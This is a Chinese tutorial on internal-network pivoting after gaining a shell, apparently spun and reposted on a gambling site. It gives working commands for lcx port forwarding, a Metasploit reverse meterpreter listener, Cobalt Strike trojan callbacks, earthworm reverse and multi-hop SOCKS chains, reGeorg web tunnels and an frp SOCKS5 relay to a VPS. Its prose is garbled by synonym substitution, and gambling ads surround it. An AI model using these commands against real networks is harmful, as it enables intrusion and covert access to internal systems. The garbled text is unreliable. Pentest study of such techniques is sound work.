首页 科技正文

联博开奖:内网渗透—流量转发

admin 科技 2020-07-12 40 0

0x00前言

在拿到一台服务器的shell的时刻,若是想要更进一步渗透测试,则需要举行内网渗透

而内网渗透的第一步就是挂署理,首先需要明确一个观点,在一样平常生涯中常用vpn挂署理去google查资料,自己搭过vpn的人都知道,要在买的vps上搭建ss的服务器端,之后在自己电脑上下载ss的客户端,确定对应的加密协议和密码就能乐成转发

而在内网渗透的流量转发是一个原理,是在拿到shell的服务器上使用工具让它酿成署理的服务器端,之后在本机使用客户端工具举行毗邻

0x01流量转发工具

需要放在拿到shell的服务器的服务器端可使用

1.lcx

2.msf

3.cobalt Strike

4.earthworm

5.reGeorg

内陆的客户端可以使用

windows

1.proxifier

2.SocksCap64

linux

1.proxychains

0x02 本次测试的环境

本次环境是公司搭的一个一层内网学习环境,本篇文章只总结流量转发的方式,因此大致先容下简化的拓扑结构

攻击机:

ip:10.86.0.87 win10(该ip能接见到最外层的DMZ区web服务器)

ip: xx.xx.xx.xx kali (虚拟机,与主机win10 举行NAT毗邻)

被攻击机:

ip: 172.16.3.145192.168.93.143 web服务器(双网卡,192为内网ip)

ip: 192.168.93.138 内网服务器,上面80有个IIS服务(能接见到该web,则说明署理乐成)

明确个观点

那么DMZ区服务器弹shell到kali虚拟机要通过本机做端口映射,kali要接见内网web服务器则署理需要设置成本机的端口

0x03 lcx转发

本工具只是端口流量转发,并不具备完整的proxy署理功效

举个例子服务器只能内陆连3389,因此攻击机连不了,然则可以通过该工具将3389转发到攻击机的端口上,就能毗邻了

拿到shell后,上传lcx.exe文件

将自身端口流量转发到攻击机端口上

使用方式

本机

吸收2333端口来的流量,并在自己的2334端口打开

lcx.exe –listen 2333 2334

联博开奖:内网渗透—流量转发 第1张

目的服务器

将自己的3389的流量转发到10.86.0.87攻击机的2333端口上

lcx.exe -slave 10.86.0.87 2333 127.0.0.1 3389

联博开奖:内网渗透—流量转发 第2张

rdp毗邻自己的2334端口

联博开奖:内网渗透—流量转发 第3张

自己流量转发

这玩意儿还能在自己的上举行端口转发,好比把3389端口流量转到自己的2333端口

lcx.exe -tran 2333 127.0.0.1 3389

联博开奖:内网渗透—流量转发 第4张

0x04 msf

msf它自己有流量转发的模块,由于本次的msf是在kali虚拟机内里的,又由于DMZ区服务器是没法接见到kali的,意味着反弹shell是没法直接实现的

在使用msf转发前,使用frp将kali的监听端口映射到本机上

在本机中使用frps服务器端

frps.ini的设置如下,确定绑定的端口,token的值,转发的端口,即可

联博开奖:内网渗透—流量转发 第5张

启动

.\frps.exe -c .\frps2.ini

联博开奖:内网渗透—流量转发 第6张

在kali中使用frpc客户端

frpc.ini的设置如下,[common]是协议毗邻的目的,和token凭证,[appName1]~[appName3]是将10.86.0.87的10001端口映射到自己的10001端口

联博开奖:内网渗透—流量转发 第7张

启动方式,行使nohup和 &,挂后台运行

nohup ./frpc -c frpc2.ini &

联博开奖:内网渗透—流量转发 第8张

回过头来看windows本机,已经有信息了

联博开奖:内网渗透—流量转发 第9张

可以使用nc实验下,是否映射了

联博开奖:内网渗透—流量转发 第10张

接见下windows的10001端口

联博开奖:内网渗透—流量转发 第11张

再看kali内里收到了http请求头

联博开奖:内网渗透—流量转发 第12张

将shell反弹到msf上

先在msf中举行监听php的msf的shell

use exploit/multi/handler 
set payload php/meterpreter/reverse_tcp
set LPORT 10001
set LHOST 10.86.0.87
run

联博开奖:内网渗透—流量转发 第13张

现在DMZ服务器能间接通过的端口映射接见到kali的端口了,在冰蝎中可以使用设置好的反弹msf的payload

联博开奖:内网渗透—流量转发 第14张

点击给我连,就弹回来啦

联博开奖:内网渗透—流量转发 第15张

使用msf设置署理

拿到msf的shell了后,就是上署理了,这里由于我之前已经扫过网段了,可以确定内网是192.168.93.0/24网段

因此添加路由

meterpreter> run autoroute -s 192.168.93.0/24

可以查看

meterpreter> run autoroute -p

联博开奖:内网渗透—流量转发 第16张

接下来将该shell挂起到后台

meterpreter> background

而且使用sock4a模块举行转发

use auxiliary/server/socks4a #socks4a socks5都可以
set srvhost 127.0.0.1
set srvport 1084
run

联博开奖:内网渗透—流量转发 第17张

kali中直接firefox接见下192.168.93.80的web,页面是加载不出来的

联博开奖:内网渗透—流量转发 第18张

接下来使用proxychains来署理接见内网的web

设置一下

vim /etc/proxychains.conf

联博开奖:内网渗透—流量转发 第19张

proxychains curl http://192.168.93.138

即可接见乐成

联博开奖:内网渗透—流量转发 第20张

0x05 Cobalt Strike署理

这个就很好用了,强烈推荐,由于我是在windows上起的cs的服务器,因此反向署理就是本机不需要端口映射,操作也异常简朴(就这玩意儿老断开毗邻,可能我电脑的问题

先建立个listener

联博开奖:内网渗透—流量转发 第21张

天生一个exe的木马,当然有杀软的话可以使用powershell或者编程语言运行代码直接反弹

联博开奖:内网渗透—流量转发 第22张

丢到服务器上运行

联博开奖:内网渗透—流量转发 第23张

OK弹回来了

联博开奖:内网渗透—流量转发 第24张

由于这里是署理使用的总结,就不深入总结cs的行使,直接使用署理模块

这里cs有2个署理方式,一个是浏览器署理,一个是sock署理

首先看浏览器署理

联博开奖:内网渗透—流量转发 第25张

联博开奖:内网渗透—流量转发 第26张

接下来,就可以使用我本机的浏览器,挂署理接见了,挂署理方式和burp一样,这里使用的是本机的4001端口

联博开奖:内网渗透—流量转发 第27张

设置方式很简朴

联博开奖:内网渗透—流量转发 第28张

接见下试试

联博开奖:内网渗透—流量转发 第29张

在kali虚拟机中同理,也可以使用这样的方式接见web了

联博开奖:内网渗透—流量转发 第30张

然则proxychains是不行的,接下来可以使用cs的另一个署理socks

联博开奖:内网渗透—流量转发 第31张

联博开奖:内网渗透—流量转发 第32张

接下里设置proxychains

联博开奖:内网渗透—流量转发 第33张

乐成署理

联博开奖:内网渗透—流量转发 第34张

0x06 使用earthworm

ew是一个很厉害的软件,然则由于很厉害以是作者已经关闭下载了....

他有种种系统的可执行文件

联博开奖:内网渗透—流量转发 第35张

ew具有lcx的转发功效,还能执行socks署理

正向署理和反向署理的区别许多文章都有提到,从表面上看正向署理的署理端口和ip是在被攻击的服务器上,反向署理的端口和ip是自己的本机

正向署理

将对应系统的可执行文件上传上去

只需要在服务器执行

ew_for_Win.exe -s ssocksd -l 2336

联博开奖:内网渗透—流量转发 第36张

设置好proxychains,署理为172.16.3.145:2336端口,能够接见内网了

联博开奖:内网渗透—流量转发 第37张

反向署理

在内陆使用ew举行端口监听,意思是将内陆从4399吸收到的流量转发到2337端口上

.\ew_for_Win.exe -s rcsocks -l 2337 -e 4399

联博开奖:内网渗透—流量转发 第38张

在跳板的服务器上执行,将自己的署理服务转到远程10.86.0.87服务器上的4399端口

ew_for_Win.exe -s rssocks -d 10.86.0.87 -e 4399

联博开奖:内网渗透—流量转发 第39张

实验下

联博开奖:内网渗透—流量转发 第40张

ew具有lcx的功效

在最上面先容lcx的时刻提到了lcx具有将远程的端口映射到内陆,和将内陆的端口A流量转移到端口B的功效

ew同样有lcx的功效,使用方式如下,这里照样拿3389为例

将远程端口映射到内陆

在本机起监听,监听自己的4399和2338端口,将4399端口收到的数据转出到2338端口吸收

.\ew_for_Win.exe -s lcx_listen -l 2338 -e 4399

在远程的服务器上执行

ew_for_Win.exe -s lcx_slave -d 10.86.0.87 -e 4399 -f 127.0.0.1 -g 3389

联博开奖:内网渗透—流量转发 第41张

将本机的端口A转发到端口B

ew_for_Win.exe -s lcx_tran -l 4002 -f 127.0.0.1 -g 3389

联博开奖:内网渗透—流量转发 第42张

多级署理

ew移植lcx的功效不仅仅是为了聚集功效,更主要的是可以依附该功效到达多层署理,这里没有现实的环境,举个例子

攻击机A ,边间服务器B,内网1层的服务器C,内网2层的服务器D

首先拿到B,挂好署理,只能看到C,但不能看到D,这时刻就要借助EW的转发功效实现多层内网渗透

攻击机A,使用反向署理

将接到的3001端口的流量,开到自己的2001端口上,最终是挂内陆2001端口,实现署理的

.\ew_for_Win.exe -s rcsocks -l 2001 -e 3001

界限服务器B,使用流量转发和流量监听

流量转发,将内陆4001端口流量转移到A的3001端口上

.\ew_for_Win.exe -s lcx_slave -d A的ip -e 3001 -f 127.0.0.1 -g 4001

流量监听,将接受到的5001端口的流量转到自己的4001上

.\ew_for_Win.exe -s lcx_listen -l 4001 -e 5001

内网1层的服务器C

反向署理,将自己的5001的socks署理传给B的5001端口

.\ew_for_Win.exe -s rssocks -d B的ip -e 5001 

综上所述,接见到D的流量如下

D -> C -> B:5001 -> B:4001 -> A:3001 -> A:2001 

挂A:2001的署理,即可接见到D

0x07 reGeorg

reGeorg使用起来也很利便,他和以上的几种工具想比,它不需要在目的上运行程序,只需要把对应的web的剧本上传上去能够接见即可

联博开奖:内网渗透—流量转发 第43张

reGeorg的文件主要是以web的后台语言为署理剧本,因此要使用reGeorg的先决条件是需目的具有web服务

这里的例子是PHP,先上传tunnel.php函数报错了,之后我上传了tunnel.nosocket.php,则正常工作了

联博开奖:内网渗透—流量转发 第44张

tunnel.nosocket.php能正常打开

联博开奖:内网渗透—流量转发 第45张

接下来在内陆,使用python运行它的py剧本,若是不加-l参数则默认是127.0.0.1的地址开启的署理,这时kali就没法使用10.86.0.87,ip来设置署理了

python .\reGeorgSocksProxy.py -l 10.86.0.87 -p 5432 -u http://172.16.3.145/tunnel.nosocket.php

联博开奖:内网渗透—流量转发 第46张

自己的5432端口即为署理端口

联博开奖:内网渗透—流量转发 第47张

0x08 frp

在博客迁居的时刻,又另外学到一招使用frp举行内网署理的,十分稳固好用,最主要的是frp是正常软件,杀软一样平常不会杀
理清思绪,跳板机是frpc,我们的vps是frps,将跳板机的流量转到vps的一个端口上,署理走vps的转发端口即可完成内网署理

在跳板机上的frpc.ini内容如下,将tcp的流量使用socks5,压缩一下转到远程端口的8881上

[common]
server_addr = mi0.xyz
server_port = 7000
token = xxxxxx

[socks_proxy]
type = tcp
remote_port = 8881
plugin = socks5
use_compression = true

在vps服务器上的frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7000
token = xxxxx

之后先在vps上启动frps.ini

nohup ./frps -c frps.ini &

在跳板机上启动frpc.ini

#linux
nohup ./frpc -c frpc.ini &
#windows
./frpc.exe -c frpc.ini

0x09署理客户端

在最前面讲到有3个署理的客户端,其中proxychains是linux下的,也是上面种种工具使用时刻,使用的署理方式验证,proxifierSocksCap64均是windows下的工具,有图形化的界面,免费的。proxifier随便找个激活码即可

proxychains

安装,kali自带的

apt-get install proxychains

直接修改/etc/proxychains.conf文件

在最下面的[ProxyList]中以以下花样设置署理

socks4 ip port
或者
socks5 ip port

联博开奖:内网渗透—流量转发 第48张

使用方式也很简朴,这样msf就能自己挂署理了

proxychains msfconsole

然则proxychains有些下令不支持,好比ping

proxifier

该工具是windows下的,设置有2个注重点即可

1.设置署理的ip和端口

2.设置走署理的exe程序

以刚刚的reGeorg署理为例

联博开奖:内网渗透—流量转发 第49张

设置好了署理的服务器,接下来设置哪些服务走该署理

联博开奖:内网渗透—流量转发 第50张

Direct是直连,即不走署理的意思, proxy SOCKS5 即是刚刚设置的署理,当前设置是firefox走署理,chrome.exe不走署理

这个规则表和设置交换机的ACL协议一样,从上往下读协议的

若是要burp抓包,则使用Any,Any,Any,即所有应用都走署理即可

SocksCap64

proxifier很相似,先设置署理

联博开奖:内网渗透—流量转发 第51张

接下来右键下面的应用,选择在署理隧道中运行即可,该应用也可以添加

这里在署理隧道中运行chrome,即可接见内网的web服务

联博开奖:内网渗透—流量转发 第52张

0x09 结语

挂署理思绪清楚了是对照简朴的事情,渗透测试和CTF稍微差别的地方在于,CTF注重原理,深入到代码的写法问题,而渗透测试则注重工具的使用。lcx和ew很容易被杀软杀掉,然则在对照low或者竞赛或者学习的环境中或者关掉杀软的情况下照样对照好使的@_@

,

Allbet电脑版下载

欢迎进入Allbet电脑版下载(Allbet Game):www.aLLbetgame.us,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

版权声明

本文仅代表作者观点,
不代表本站AllbetGame的立场。
本文系作者授权发表,未经许可,不得转载。

评论